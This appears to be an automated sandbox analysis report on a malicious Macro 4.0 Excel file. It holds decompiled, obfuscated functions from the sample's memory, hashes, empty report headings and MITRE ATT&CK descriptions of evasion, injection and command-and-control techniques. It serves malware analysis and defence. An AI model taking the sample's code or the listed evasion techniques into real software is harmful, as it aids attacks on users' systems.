Instruction ID: 70ad689ee023e80a6db14eadaef927469d72580a84d77f7cc3ebeba9af05c8b5
Opcode Fuzzy Hash: ea71abc9060870624eee78be531de38e292de3fa50a3bda0095037a54bc3101b
Instruction Fuzzy Hash: CF2129717002396FDB1C8AA98CD65FFBEDDEB88660B05413BF406DB291E5A48D4183E0

Uniqueness

Uniqueness Score: -1.00%

Function 000946E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000946E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x000946e7
0x000946ea
0x000946ed
0x000946f4
0x000946fa
0x000946ff
0x00094709
0x00094711
0x00094713
0x00094715
0x00094718
0x00094720
0x00094725
0x00094781
0x00094784
0x00094786
0x00094791
0x0009479a
0x0009479f
0x000947a1
0x000947a3
0x000947ab
0x00000000
0x00000000
0x0009472c
0x00094731
0x0009473a
0x000947ad
0x000947ad
0x000947b6
0x000947ca
0x000947ca
0x000947cd
0x000947d1
0x000947e2
0x000947e7
0x000947f9
0x000947fc
0x000947fe
0x00094800
0x00094806
0x00094808
0x0009480a
0x00094810
0x0009481d
0x00094838
0x00094838
0x00094810
0x00094844
0x00094844
0x000947b8
0x000947be
0x00000000
0x000947c5
0x000947c5
0x00000000
0x000947c5
0x000947be
0x0009473c
0x00094743
0x00094745
0x0009474d
0x00094845
0x00094753
0x0009475d
0x00094760
0x0009476d
0x00094773
0x0009477c
0x0009477c
0x0009474d
0x00094743

APIs

OffsetRect.USER32 ref: 000946FF
LookupPrivilegeValueW.ADVAPI32(00000000,-000B1D33,?), ref: 00094791
EndDialog.USER32 ref: 000947D1
SetTextColor.GDI32(-025D1D33,-03E11D33), ref: 0009481D

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: c28254e91cc9728cd500f66602ef27c31b092bbb0b24000b771ab6631e913eb3
Instruction ID: 9ba050ebae513c17508a059913b242c535c4c40c2c5e30d2476a67e724f3c317
Opcode Fuzzy Hash: c28254e91cc9728cd500f66602ef27c31b092bbb0b24000b771ab6631e913eb3
Instruction Fuzzy Hash: EB411833B005285BDF18CE58CCE0ABFB7EAEB95351B568629F8199B741C634AD46C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 000929D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000929D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -711115
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -710243
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -711066
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x000929d7
0x000929df
0x000929e1
0x000929e5
0x000929f0
0x000929f5
0x00092a01
0x00092a17
0x00092a1f
0x00092a2b
0x00092a2b
0x00092a31
0x00092a34
0x00092a37
0x00092a3d
0x00092a41
0x00092a43
0x00092a43
0x00092a4b
0x00092a51
0x00092a53
0x00092a57
0x00092a59
0x00092a5c
0x00092a62
0x00092a6f
0x00092a81

APIs

DeleteDC.GDI32(-000ADD33), ref: 000929E5
SetWindowPos.USER32(-000ADD33,00097BEC,00000191,00097BEC,00097BEC,00097BEC,00000191), ref: 00092A1F
ResetEvent.KERNEL32(-000AD663,?,00097BEC,-000B1FA0,-03E11D33,-000B1D33,?,00099287,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 00092A4B
CreateDIBSection.GDI32(-000AD99A,-000AD99A,-000AD9CB,-000AD663,-000AD9CB,-000AD9CB), ref: 00092A6F

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: 3409eff8cf9416cd87beb010bacdbf8b4ae8af0e4800778182f601db0a6ec57f
Instruction ID: 56f4f18647e72d7b827c133b4484286b29c65badd572b00d73a90061db79f27f
Opcode Fuzzy Hash: 3409eff8cf9416cd87beb010bacdbf8b4ae8af0e4800778182f601db0a6ec57f
Instruction Fuzzy Hash: 4C11EB73B002247FE7248A5ADC49EDBBA5EE7C9710F060226F949DB150D575AF05C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 000ADA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000ADA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E00097200(0xb05f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4);
				}
				SetLastError(0);
				return _t4;
			}

0x000ada3f
0x000ada47
0x000ada4c
0x000ada53
0x000ada53
0x000ada5b
0x000ada66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001), ref: 000ADA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 000ADA4C
CloseHandle.KERNEL32(00000000), ref: 000ADA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 000ADA5B

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: f2e908e6812aa9bcd17f4081954baace572480927d5260a5a849c33e9e80e63c
Instruction ID: f02f903d2dd272a4138a7761e4e52e7b7db864338197488a3d1a01538f620e7e
Opcode Fuzzy Hash: f2e908e6812aa9bcd17f4081954baace572480927d5260a5a849c33e9e80e63c
Instruction Fuzzy Hash: 61E04FB2694204ABF65037E46C0AFEB3A7C9B04B42F440161FB0DD9181E6699454C7BA

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report case (166).xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "case (166).xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 0084AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Function 0085DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Function 0085D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Function 0085B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Function 008569A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Function 0084D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Function 00841A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Function 0085DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Function 00855BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Function 00843A30, Relevance: .1, Instructions: 149
COMMONCrypto

Function 00849A60, Relevance: .1, Instructions: 127
COMMONCrypto

Function 00858830, Relevance: .1, Instructions: 113
COMMON

Function 00849C60, Relevance: .1, Instructions: 95
COMMONCrypto

Function 0085CE40, Relevance: .0, Instructions: 36
COMMON

Function 00852EF0, Relevance: .0, Instructions: 2
COMMON

Function 008446E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Function 008429D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Function 000A9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Function 00091AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Function 0009BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Function 000ABAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Function 000A1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Function 0009BCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Function 000A8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Function 0009A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Function 000A5420, Relevance: 4.6, APIs: 3, Instructions: 72
fileCOMMON

Function 0009ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Function 000A4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Function 000A3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Function 000A5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Function 000A58D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Function 000A9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre